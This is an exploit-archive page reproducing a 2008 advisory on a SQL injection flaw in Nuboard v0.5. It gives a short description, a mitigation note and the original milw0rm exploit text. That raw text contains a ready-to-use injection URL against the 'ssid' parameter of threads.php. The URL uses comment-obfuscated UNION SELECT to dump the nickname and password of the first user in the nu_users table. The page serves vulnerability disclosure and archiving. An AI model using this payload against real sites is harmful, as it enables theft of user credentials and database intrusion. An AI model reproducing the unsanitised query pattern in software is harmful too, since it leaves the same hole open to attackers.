header-logo
Suggest Exploit
vendor:
Nuboard_v0.5
by:
IRCRASH
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Nuboard_v0.5
Affected Version From: Nuboard_v0.5
Affected Version To: Nuboard_v0.5
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Nuboard_v0.5 SQL Injection Vulnerability

A vulnerability exists in Nuboard_v0.5 which allows an attacker to inject arbitrary SQL commands. This can be exploited to gain access to the database and potentially gain access to sensitive information. The vulnerability is due to insufficient sanitization of user-supplied input to the 'ssid' parameter in 'threads.php' script. An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable script. This can be done by sending a specially crafted URL to the vulnerable script.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of the software.
Source

Exploit-DB raw data:

#####################################################################################
####                Nuboard_v0.5 SQL Injection Vulnerability                     ####
####                               By IRCRASH                                    ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH                                                                   #
#Discovered by : Dr.Crash                                                           #
#Exploited By : Dr.Crash                                                            #
#IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm                               #
#                                                                                   #
#####################################################################################
#                                                                                   #
#Script Download : http://switch.dl.sourceforge.net/sourceforge/nuboard/nuboard_v0.5.tar.gz
#                                                                                   #
#####################################################################################
#                                   < SQL >                                         #
#SQL Address : http://Target/threads.php?ssid=9999%27union/**/select/**/CoNcAt(0x4c6f67696e3a,nick,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)/***/from/**/nu_users/**/where/**/id=1/*
#                                                                                   #
#####################################################################################
#                         Our site : Http://IRCRASH.COM                             #
#####################################################################################

# milw0rm.com [2008-02-14]

Navigation

Suggest Exploit

Services By CQR